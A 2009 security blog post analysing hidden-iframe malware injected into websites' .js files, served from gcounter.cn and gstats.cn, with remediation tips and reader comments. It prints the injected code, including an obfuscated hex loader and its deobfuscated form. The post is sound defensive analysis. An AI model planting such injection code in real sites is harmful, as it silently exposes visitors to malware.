msgbartop
Unmask Parasites - Check your web pages for hidden links, iframes, malicious scripts, unauthorized redirects and other signs of security problems.
msgbarbottom
Loading site search ...

GStats .cn and GCounter .cn – Malicious Code in .js Files

   22 Jun 09   Filed in Tips and Tricks, Website exploits

This must be not a new attack (I’ve found an almost year old article that mentions gcounter iframes) but I started to notice it this past weekend. First, on the Google’s Webmaster Forums, then in the Unmask Parasites logs. So I guess it’s a new wave of the attack.

GCounter .cn

When I first encountered a site infected by gcounter, I checked it with Unmask Parasites. Nothing suspicious was found except for the fact that the domain name was blacklisted by Google. I checked the diagnostic page and found this clue:

Malicious software is hosted on 1 domain(s), including gcounter.cn/.


I opened the site in Firefox and temporarily enabled the site domain in NoScript. When the page reloaded, another item appeared in the NoScript menu: “Allow gcounter.com“. Bingo! The fact it was not initially there means that the malicious code is somewhere in external .js files. I downloaded (using wget) all referenced .js files and located the following code in one of them:

if (document.cookie.search("coqwg=3") == -1) {
d ocument.write("<i"+"fr"+"ame sr"+"c=http:"+"//"+"gcou"+"nter"+".cn styl"+"e"+"=displa"+"y:no"+"ne>"+"</i"+"fram"+"e>");
d ocument.cookie = "coqwg=3;expires=Sun, 01-Dec-2011 08:00:00 GMT;path=/";}

As you can see, it injects a hidden iframe that loads content from gcounter .cn.

The code also sets a cookie so that only new visitors get infected. So the next time the NoScript trick won’t work if your browser already has that cookie.

When I checked another site with gcounter .cn mentioned on the diagnostic page, I also found the malicious code in one of the external .js files.

Note, that the code is not simply appended at the very bottom of .js files like in the Gumblar exploit, it is injected somewhere in the middle of legitimate JavaScript code. It may even not occupy a separate line, so it is very easy to overlook it.

GStats .cn

Another day I found a site with the following record on the Google’s Safe Browsing diagnostic page:

Malicious software is hosted on 1 domain(s), including gstats.cn/.

The same NoScript trick revealed the malicious code in external .js files. This time the malicious code was more encrypted and looked like this:

AA3EC055="p";AA3EC055+="arseI";AA3EC055+="nt";E0B4B25AF7590="Stri";E0B4B25AF7590+="n";E0B4B25AF7590+="g.fr";E0B4B25AF7590+="omCha";
E0B4B25AF7590+="rCo";E0B4B25AF7590+="de";function ACE13AC7F5(A8D133){var DB529=495;DB529=DB529-479;D59CA3C8=eval(AA3EC055+"(A8D133,DB529)");return(D59CA3C8);}
function A230982771962E(D2A369){var DA09B=114;DA09B=DA09B-112;var C8120BEFABE1C="";for(BE4025D=0;BE4025D<D2A369.length;BE4025D+=DA09B){
C8120BEFABE1C+=(eval(E0B4B25AF7590+"(ACE13AC7F5(D2A369.substr(BE4025D,DA09B)))"));}e val(C8120BEFABE1C);}
A230982771962E("69662028646F63756D656E742E636F6F6B69652E73656172636828226A7366783D332229203D3D202D3129207B0A787765773D646F63756D656E742E676574456C656D656E74427949642827636D6B27293B696628787765773D3D6E756C6C297B646F63756D656E742E777269746528273C696672616D652069643D636D6B207372633D687474703A2F2F6773746174732E636E207374796C653D646973706C61793A6E6F6E653E3C2F696672616D653E27293B7D0A646F63756D656E742E636F6F6B6965203D20226A7366783D333B657870697265733D53756E2C2030312D4465632D323031312030383A30303A303020474D543B706174683D2F223B7D");

After deobfuscation, the code looked similar to the gcounter‘s

if (document.cookie.search("jsfx=3") == -1) { xwew=document.getElementById('cmk');if(xwew==null){
d ocument.write('<iframe id=cmk src=http://gstats . cn style=display:none></iframe>');}
d ocument.cookie = "jsfx=3;expires=Sun, 01-Dec-2011 08:00:00 GMT;path=/";}

No wonder, both gcounter .cn and gstats .cn reside on the same server with IP address of 92.241.176.101.

The differences of the gstats modification from the above gcounter code are:

  • gstats . cn domain used
  • the code is more obfuscated and changes from site to site
  • the cookie names and the iframe ids also vary from site to site
  • I’ve seen this code only at the very bottom of .js file, so it may be slightly easier to find it.

Modification dates

Another interesting fact about the infected .js files is they have pretty old modification dates. The newest file had a February’s modification date. And the oldest was not modified since January 2004. So it looks like the hackers can change the modification date of files once they inject the malicious code.

At this moment I don’t have any information about how the .js files get infected. I can only guess that it has to do with compromised FTP credential (as many other recent attacks).

  • So be sure to check your local computers for malware.
  • then change all passwords
  • and refrain from saving them in programs you use to upload files to a web server (FTP clients, DreamWeaver, etc.).
  • Don’t use FTP if possible. This protocol is insecure. Use SFTP instead – Most decent hosting plans include this option.
  • Browse the web with a secure browser. I recommend the Firefox+NoScript combo.

Have your say

If you have more information about this exploit, please leave your comments here. The more we know about the attack the easier we can withstand it.

P.S. This exploit is not directly detected by Unmask Parasites since external .js files are not checked. However, some infected sites can be detected as suspicious if Google have already blacklisted them.  So click the “details” link next to  Google’s advisory and if you see gstats .cn or gcounter .cn on the diagnostic page you know where the malicious code hides.

Update Aug 31, 2009: I’ve just found a script that injects a hidden gcounter .cn iframe at the bottom of an HTML file. This time it is detectable by Unmask Parasites. So don’t forget to check HTML files (all web pages)  too.

Similar posts:

Reader's Comments (7)

  1. |

    Thanks for this.

    My site has backlisted by Google. I hope just for a moment.

  2. |

    many thanks, you saved my day!

  3. |

    ps: if you run a website with TYPO3, look for the script in js-files @ «/typo3temp».

  4. |

    Txs for this information. It saved me a lot of work and time.
    Regards
    Paul

  5. |

    [...] is some information about GCounter.cn and GStats.cn on the UnmaskParasites-blog. It’s not clear what it does. My computer is still working, so I guess it doesn’t do [...]

  6. |

    jeez. how does one search for the expression in our files or database records if the code is the split up in who knows what way, and or obfuscated? i tried using regular expressions, but wow this is difficult.

    good find, but assuming the script may be more sophisticated now, how can we isolate the include?

    • |

      You might want to put your files under version control. This way you’ll be able to detect all unauthorized modifications and easily restore a clean version.